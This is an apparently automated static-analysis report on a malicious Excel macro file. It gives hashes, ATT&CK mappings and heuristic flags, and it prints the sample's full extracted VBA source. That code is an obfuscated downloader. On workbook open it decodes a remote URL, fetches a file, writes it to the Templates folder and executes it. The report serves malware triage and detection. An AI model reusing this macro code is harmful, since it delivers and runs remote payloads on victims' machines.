Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 f673426085334e70…

MALICIOUS

Office (OOXML) / .XLSM

267.5 KB Created: 2026-04-02 06:26:39 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2026-06-17
MD5: e89bb9f6f70d822285cf7883550357e5 SHA-1: 7455aa217bbbca327d4d8af20e3629ff7f96d641 SHA-256: f673426085334e706064501731e19ca5112d78c48aa94869ad1b8017874820fa
248 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is an XLSM file containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, along with a critical finding for downloading and executing a file via HTTP. The Workbook_Open macro is present, suggesting automatic execution upon opening. While the script is obfuscated, the overall pattern points to a downloader.

Heuristics 7

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set GiyhjHjb = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    FQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLx = DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set GiyhjHjb = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7503 bytes
SHA-256: ae97b608b071c8f9f11bc9ab66299f74940eaee3b165aa4f20774878728a6c99
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
    Public Function tPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyce(JQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUz)
        nZBXkygxjnMBysKHfAYfbnqEZclvpSjBVpjYENNMRCvChttJMPHgvoXFIdFJXiDQDqRomOwNzDdDOIbXvQpiepGUqeo = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãä娶§Ú¥"
        LGjlRmrzpUeediELSxKJZdgXwLEoWYtVbolThGGiqDfyeCTuTfYrbxhsyuFWltuEcWABipHPFlghfkVcjzbZqgjZzcHFncwm = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNضQR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For g = 1 To Len(JQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUz)
            drBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAAnZBXkygxjnMBysKHfAYfbnq = InStr(nZBXkygxjnMBysKHfAYfbnqEZclvpSjBVpjYENNMRCvChttJMPHgvoXFIdFJXiDQDqRomOwNzDdDOIbXvQpiepGUqeo, Mid(JQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUz, g, 1))
            If drBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAAnZBXkygxjnMBysKHfAYfbnq > 0 Then
                EZclvpSjBVpjYENNMRCvChttJMPHgvoXFIdFJXiDQDqRomOwNzDdDOIbXvQpiepGUqeoLGLMtNSbQwFFEJgnuYmlBEHzXngPyAU = Mid(LGjlRmrzpUeediELSxKJZdgXwLEoWYtVbolThGGiqDfyeCTuTfYrbxhsyuFWltuEcWABipHPFlghfkVcjzbZqgjZzcHFncwm, drBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAAnZBXkygxjnMBysKHfAYfbnq, 1)
                xCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPl = xCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPl + EZclvpSjBVpjYENNMRCvChttJMPHgvoXFIdFJXiDQDqRomOwNzDdDOIbXvQpiepGUqeoLGLMtNSbQwFFEJgnuYmlBEHzXngPyAU
            Else
                xCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPl = xCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPl + Mid(JQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUz, g, 1)
            End If
        Next
        tPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyce = xCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPl
    End Function



Private Sub Workbook_Open()
Dim gPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZk As Integer
gPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZk = Chr(50) + Chr(48) + Chr(48)
  Dim GiyhjHjb As Object
    Dim SpecialPath As String

    Set GiyhjHjb = CreateObject("WScript.Shell")
    SpecialPath = GiyhjHjb.SpecialFolders("Templates")
Dim KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb
Dim FQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLx
Dim WrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUjtccOBdzLZHYKOodZTmjGcAGCORgBDMWRu
Dim ZqgjZzcHFncwmdrBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAA
Dim mrzpUeediELSxKJZdgXwLEoWYtVbolThGGiqDfyeCTuTfYrbxhsyuFWltuEcWABipHPFlghfkVcjzbZqgjZzcHFncwm
Dim KdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXn As Integer
Dim DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj
Dim QwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLxDKcCBRHKCbDjhODXNESdLLyyZiv
KdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXn = 1

Range("A1").Value = "Please Wait......"


Set DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj = CreateObject("microsoft.xmlhttp")
Set mrzpUeediELSxKJZdgXwLEoWYtVbolThGGiqDfyeCTuTfYrbxhsyuFWltuEcWABipHPFlghfkVcjzbZqgjZzcHFncwm = CreateObject("Shell.Application")

ZqgjZzcHFncwmdrBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAA = SpecialPath + tPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyce("\XäáH§QFGV.ÂÛÂ")
DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj.Open "get", tPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyce("hÖÖÓÕ://bÀgÕÔÀd.wÒÔk/bÀÕÕÂÖÕÁÒÅÖÂÅÖÕ/dhÛdÀÂÙÃkÁÃÛdÖÃkhlÃgÁkÃÛkÃÛjdzhÕzÂÃÃÛÂÕÂzdhdzÕdÕdhhzÕzÕdhdÛÛz/gÜvÙdÂÔ.ÂÛÂ"), False
DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj.send
FQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLx = DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj.responseBody
If DKcCBRHKCbDjhODXNESdLLyyZivWrVuLXMJDVSqZkqmyOPlnwTAeubhAIxdYYXcNGNsSETXbSrUzjfToeUj.Status = 200 Then
Set KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb = CreateObject("adodb.stream")
KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb.Open
KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb.Type = KdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXn
KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb.Write FQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXngPyAUxCPMvIiiJRfGZFevVwHBTCYITZVhyNUVgDyceJQkshMIIGLx
KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb.SaveToFile ZqgjZzcHFncwmdrBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAA, KdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXn + KdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSbQwFFEJgnuYmlBEHzXn
KOodZTmjGcAGCORgBDMWRuKdxQKAgppoteWeIVUlorjHWPzikEhmzJfsgRtPOqXpbfFfqkCzWsQJFQiwRFPniLMtNSb.Close
End If
mrzpUeediELSxKJZdgXwLEoWYtVbolThGGiqDfyeCTuTfYrbxhsyuFWltuEcWABipHPFlghfkVcjzbZqgjZzcHFncwm.Open (ZqgjZzcHFncwmdrBkkWWyGTvPuSkwlicurNxIOKVnoJLUsYCSzFYhVBxxvAmfmQrdswzrPtXHDsMCtHRAA)
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 22528 bytes
SHA-256: 9944a415a6aa95b8b894156673d848ef73e377a633c83c04c7bed707a07de8de
Detection
ClamAV: No threats found
Obfuscation or payload: likely
137 of 237 identifiers look randomly generated (e.g. 'EZclvpSjBVpjYENNMRCvChttJMPHgvoXFIdFJXiD') — consistent with name-mangling obfuscation.